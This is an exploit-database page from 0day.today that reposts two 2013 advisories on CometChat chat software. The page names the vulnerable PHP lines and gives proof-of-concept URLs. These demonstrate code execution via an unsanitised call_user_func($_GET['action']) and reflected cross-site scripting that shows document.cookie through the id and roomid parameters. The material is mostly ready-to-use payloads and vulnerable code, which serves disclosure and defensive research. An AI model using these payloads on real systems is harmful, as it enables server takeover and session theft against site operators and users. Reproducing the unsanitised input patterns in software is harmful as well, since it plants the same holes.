0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cometchat - Multiple Vulnerabilities
[##################################################################################
__ _ _ ____
/ /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _
__ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ /
\____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, /
/____/
##################################################################################
Cometchat chat Application All Version Multiple Vulnerabilities
Cometchat is a chat application which in use Vbulletin,Xenforo,SMF,MyBB and other integrated scripts
Author(Pentester): B127Y
Special Thanks : Burtay and All Janissaries Team(Burtay,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
Jani Exploit id 1 (http://www.janissaries.org/exploits/1)
##################################################################################
1.)Code Execution P0C (modules/chatrooms/chatrooms.php)
call_user_func call_user_func($_GET['action']);
Can use all php functions and cometchat function without arguments
Live Demo:http://server/cometchat/modules/chatrooms/chatrooms.php?action=phpinfo
2.)XSS P0C (plugins/handwrite/index.php)
echo echo <<<EOD <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>{$handwrite_language[0]}</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <style> html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td { margin: 0; padding: 0; border: 0; outline: 0; font-weight: inherit; font-style: inherit; font-size: 100%; font-family: inherit; vertical-align: baseline; text-align: center; } html { height: 100%; overflow: hidden; /* Hides scrollbar in IE */ } body { height: 100%; margin: 0; padding: 0; } #flashcontent { height: 100%; } </style> </style> </head> <body><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="100%" height="100%" align="middle" id="main"> <param name="allowScriptAccess" value="sameDomain" /> <param name="movie" value="handwriting.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="FlashVars" value="tid={$toId}" /> <param name="scale" value="exactFit" /> <embed src="handwriting.swf" width="100%" height="100%" autostart="false" quality="high" bgcolor="#ffffff" FlashVars="tid={$toId}" name="main" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /> </object></body> </html> EOD;
$toId = $_GET['id'];
Live Demo:http://server/cometchat/plugins/handwrite/index.php?id="><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
#########
# z3r0sPl0iT #
#########
Info:
All Cometchat Application Multiple Vulnerabilities
Cometchat is a application which can be used in many site for example phpFox, Wordpress, Joomla, MyBB, Elgg etc.
Homepage : http://www.cometchat.com
Author: z3r0sPlOiT
Date: 17.02.2013
Special Thanks: I would like to thank B127Y. He already found two vulnerabilities for Cometchat and because of this I started my research.
1.)Code Execution P0C (plugins/otavchat/invite.php)
194: call_user_func call_user_func($_GET['action']);
Can use all php functions and cometchat function without arguments
Live Demo: http://server/cometchat/plugins/otavchat/invite.php?action=phpinfo
2.)XSS P0C (plugins/otavchat/invite.php)
137: echo echo <<<EOD <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>{$otavchat_language[18]}</title> <link type="text/css" rel="stylesheet" media="all" href="themes/{$theme}/otavchat{$rtl}.css" /> </head> <body> <form method="post" action="invite.php?action=inviteusers"> <div class="container2"> <div style="background-color:#3E92BD;border-bottom:1px solid #11648F;"> <div class="invitetitle">{$otavchat_language[16]}</div><div style="float:right"><input type=submit value="{$otavchat_language[17]}" class="invitebutton"></div> <div style="clear:both"></div> </div> <div style="height:162px;overflow-x:hidden;overflow-y:scroll;clear:both;padding-left:5px;padding-top:5px;padding-bottom:5px;">{$s['available']}{$s['away']}{$s['offline']}</div> </div> <input type="hidden" name="roomid" value="$id"> </form> </body> </html> EOD;
87: $id = $_GET['roomid'];
Live Demo: http://server/cometchat/plugins/otavchat/invite.php?roomid="><script>alert(document.cookie)</script>
3.)XXS P0C (plugins/filetransfer/index.php)
87: echo echo <<<EOD <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>{$filetransfer_language[0]}</title> <link type="text/css" rel="stylesheet" media="all" href="themes/{$theme}/filetransfer{$rtl}.css" /> <script type="text/javascript" src="styleinput.js"></script> </head> <body><form name="upload" action="upload.php" method="post" enctype="multipart/form-data"> <div class="container"> <div class="container_title">{$filetransfer_language[1]}</div> <div class="container_body"> <div class="container_body_1">{$filetransfer_language[2]}</div> <div id="select-0" class="container_body_2"><label class="cabinet"><input type="file" class="file" name="Filedata" onchange="javascript:document.upload.submit()"/></label></div> <div class="container_body_3">{$filetransfer_language[4]}</div> <div style="clear:both"></div> <div class="container_body_4">{$filetransfer_language[3]}</div> <input type="hidden" name="to" value="{$toId}"> <input type="hidden" name="chatroommode" value="{$chatroommode}"> </div> </div> </div> <script> SI.Files.stylizeAll(); </script> </form> </body> </html> EOD;
79: $toId = $_GET['id'];
Live Demo: http://server/cometchat/plugins/filetransfer/index.php?id="><script>alert(document.cookie)</script>
# 0day.today [2024-11-16] #